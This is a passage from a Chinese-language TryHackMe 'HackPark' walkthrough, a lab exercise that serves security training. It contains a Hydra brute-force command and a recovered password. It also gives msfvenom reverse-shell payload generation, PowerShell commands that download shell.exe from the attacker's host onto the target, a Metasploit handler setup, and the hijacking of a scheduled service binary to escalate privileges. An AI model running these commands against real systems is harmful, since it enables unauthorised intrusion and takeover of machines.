【THM】HackPark-Practice

使用 Hydra 暴力破解网站登录,识别并使用公共漏洞,然后提升您在这台 Windows 机器上的权限!

1
nmap -p- -sC -sV -T4 10.10.173.96
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Nmap scan report for 10.10.173.96
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: hackpark | hackpark amusements
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2024-01-16T02:39:12+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2024-01-15T02:32:51
|_Not valid after: 2024-07-16T02:32:51
|_ssl-date: 2024-01-16T02:39:16+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Deploy the vulnerable Windows machine

Whats the name of the clown displayed on the homepage?

image-20240116104239228

Reverse Image Search

image-20240116104436339

1
pennywise

Using Hydra to brute-force a login

我们需要找到一个登录页面来攻击并确定表单向 Web 服务器发出的请求类型。通常,Web 服务器会发出两种类型的请求,一种是用于从 Web 服务器请求数据的 GET 请求,另一种是用于向服务器发送数据的 POST 请求。

您可以通过右键单击登录表单,检查元素,然后读取方法字段中的值来检查表单发出的请求。如果您通过 BurpSuite 拦截流量,您也可以识别这一点(可以在此处找到其他 HTTP 方法)。

image-20240116104620716

现在我们知道了请求类型并有了登录表单的 URL,我们可以开始暴力破解帐户了。

image-20240116105117492

1
2
3
4
hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'


hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.173.96 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=e0VQW1OyOsSO1Pdw9d07aVZqCjyBfmFBIb34zB7IhwXcWzQFbgUbJ0FOes5nGqVJUUvAOPV7Y%2B9JZO4NQEuOfkZjFMGMAn%2FvrFKmUmIsJ7a6xdi3Hm5n%2FahW0rtAlatHP8BQoriihsDJX5werhSd0PTWtH13w0xW5qHLS6uPq6WBzqMYx7yRmNR097yxiJxCPdaYp797EIbyAdZjBpZn5Xsdkw%2BI3Z7QtTAQt5OwZcySyWzFdbslAIS4EeVaCbohFKZaL2WdwOcQE2uf3%2FJmbtOslb0fOnFFRwFtIINjXRW2hDGw1pZgIXwFvb35nFNzf%2F15uNqVCcB2MFw0pIcercoZWl2JhvZzDBesA0EBxdLGyZCv&__EVENTVALIDATION=2CPNzhy6Cft1CPuLIxknkCdfc045nSfSR8%2FaDmqbjNq8qzSR%2Bqz5jcsv3G9XJzMj6ZDIXO6O2l8Q7j2EGgCETLa3Uaw%2BXEiHSr%2FeBgnBpTYcf0sIM576%2BHjlmUJxSWDekqGiuaanY6051zBx9jblKUqWF8LNswAHeBd7dqXzYVUDYpr6&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%BD%95:Login Failed" -vv

image-20240116110553238

login: admin password: 1qaz2wsx

image-20240116110619417

Below is a mini cheatsheet:

Command Description
hydra -P -v Brute force against a protocol of your choice
hydra -v -V -u -L -P -t 1 -u You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
hydra -t 1 -V -f -l -P rdp:// Attack a Windows Remote Desktop with a password list.
hydra -l -P . $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ Craft a more specific request for Hydra to brute force.

Compromise the machine

image-20240116110839630

https://www.exploit-db.com/exploits/46353

可以看到

http://10.10.173.96/admin/app/editor/editpost.cshtml

image-20240116111623666

把他上传一下

image-20240116113459873

10.10.173.96/?theme=../../App_Data/files

Windows Privilege Escalation

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.63.201 LPORT=9001 -f exe > shell.exe
1
powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:80/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
1
2
3
4
5
6
7
8
9
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.11.63.201
lhost => 10.11.63.201
msf6 exploit(multi/handler) > set lport 9001
lport => 4445
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

image-20240116132703259

进一步枚举计算机

运行的异常服务叫什么名字?

1
powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"

image-20240116145021798

1
WindowsScheduler.exe

What is the name of the binary you’re supposed to exploit?

have you checked for logs for the abnormal service?

image-20240116145542720

Using this abnormal service, escalate your privileges!

1
powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:8000/shell.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\shell.exe'"
1
2
meterpreter > mv Message.exe Message.bak
meterpreter > mv shell.exe Message.exe

image-20240116150332707

image-20240116150459286

Privilege Escalation Without Metasploit